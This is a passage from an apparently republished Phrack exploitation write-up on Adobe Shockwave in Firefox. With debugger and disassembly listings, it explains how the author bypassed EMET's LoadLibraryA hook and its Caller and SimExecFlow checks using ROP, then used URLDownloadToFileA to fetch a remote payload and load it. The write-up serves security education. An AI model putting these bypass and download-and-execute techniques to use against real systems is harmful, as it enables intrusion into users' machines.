exploits required a WebDAV server. So, in this version of the exploit I
decided to remove that requirement. This was accomplished by ROP-ing a call
to LoadLibraryA whereby I loaded the urlmon.dll module. More specifically, I
returned to LoadLibraryA+0x5 to skip over the EMET hook:

1:039> u KERNEL32!LoadLibraryA L2
76ccf864 e92f0932f9 jmp 6fff0198
76ccf869 837d0800 cmp dword ptr [ebp+8],0

1:039> u 6fff0198
6fff0198 684bedeeeb push 0EBEEED4Bh
6fff019d 60 pushad
6fff019e 9c pushfd
6fff019f 54 push esp
6fff01a0 e80bd32a05 call emet+0x4d4b0 (7529d4b0)
6fff01a5 9d popfd
6fff01a6 61 popad
6fff01a7 83c404 add esp,4

By ensuring we land at LoadLibraryA+0x5 and we control @ebp, this EMET hook
is trivially bypassed. Microsoft is aware of how limited this hook is, and
they even cite Phrack in their blog post[20].

Once urlmon.dll was loaded, I had to deal with EMET's 'Caller' mitigation,
which does the following:

"EMET will make sure that when a critical function is reached, it is reached
via a "call" instruction rather than a "ret" instruction. This is a very
useful mitigation and breaks many ROP gadgets."[20]

I also had to deal with the 'SimExecFlow' mitigation:

"This mitigation tries to detect ROP gadgets following a call to a critical
function. It works by emulating a specified number of instructions at the
return address of the caller of a critical function."[20]

Both of the above mitigations would interfere with my calling GetProcAddress
to retrieve the address of URLDownloadToFileA. They were bypassed by
returning into the middle of a module's existing call to GetProcAddress, thus
EMET could not tell that it was ROP-ed to or that it was an illegitimate call:

.text:7A25CD4A 00C push eax ; hModule
.text:7A25CD4B 010 call ds:GetProcAddress
.text:7A25CD51 008 mov [esi+18h], eax
.text:7A25CD54 008 cmp eax, edi
.text:7A25CD56 008 jnz short loc_7A25CD6D
.text:7A25CD6D loc_7A25CD6D:
.text:7A25CD6D 008 mov eax, edi
.text:7A25CD6F 008 pop edi
.text:7A25CD70 004 pop esi
.text:7A25CD71 000 retn
.text:7A25CD71 sub_7A25CD20 endp

By returning directly to the code at 0x7A25CD4A, @eax already contained the
result from LoadLibraryA("urlmon.dll\x00"), and because I could predict stack
addresses using the memory leak it was easy enough to ensure there was a
pointer to the string "URLDownloadToFileA\x00" for the call to GetProcAddress
and also that @esi was pointing to a stack address under control. Thus, I was
able to get the address of the function without a problem.

Then, I called URLDownloadToFileA to drop the payload to a default writable
local directory (C:\Users\Public) and then returned to LoadLibraryA and
loaded the code.

--[ 6 - Future Work

I began developing support for process continuation/continuation of
execution/whatever it's being called these days. It should be fairly easy to
ensure the plugin-container.exe doesn't crash hard, but would require
reversing the interaction between this process and the firefox.exe parent.

--[ 7 - Conclusion

This article wasn't intended to share anything novel... any competent exploit
writer could have implemented the attached exploit. I just wanted to share a
walkthrough from bug discovery to reliable exploit so that readers can get a
feel for what the process is like these days.

--[ 8 - Greets

Thanks to navs, sohlow, raid, & hoodlum for their insight and valuable

--[ 9 - References

[1] [url]http://community.corest.com/~gera/InsecureProgramming[/url]
[2] [url]http://virus.wikia.com/wiki/29A[/url]
[3] [url]http://www.uninformed.org[/url]
[4] [url]http://helpx.adobe.com/shockwave/kb/shockwave-player-faq.html[/url]
[5] [url]http://www.adobe.com/products/shockwaveplayer.html[/url]
[6] [url]https://wiki.mozilla.org/NPAPI[/url]
[7] [url]http://www.adobe.com/products/director.html[/url]
[8] [url]http://cansecwest.com/csw11/Adobe_Shockwave-AaronPortnoy_LoganBrown.pptx[/url]
[9] [url]http://www.microquill.com/smartheap/index.html[/url]
[10] [url]http://www.j4u2.com/jht/bio.html[/url]
[11] [url]http://helpx.adobe.com/director/topics/scripting-dictionary.html[/url]
[12] [url]http://msdn.microsoft.com/en-us/library/8dbf701c(v=vs.80).aspx[/url]
[13] [url]http://uninformed.org/index.cgi?v=7&a=2&p=5[/url]
[14] [url]http://webpy.org/[/url]
[15] [url]http://www.lighttpd.net/[/url]
[16] [url]https://code.google.com/p/narly/[/url]
[17] [url]http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-[/url]
[18] [url]http://media.blackhat.com/bh-us-12/Briefings/M_Miller/BH_US_12_Miller[/url]
[19] [url]http://blogs.technet.com/b/srd/archive/2010/07/28/announcing-the-[/url]
[20] [url]http://blogs.technet.com/b/srd/archive/2012/07/24/emet-3-5-tech-preview-[/url]

Sursa: http://phrack.org/papers/shockwave_memory_disclosure.html

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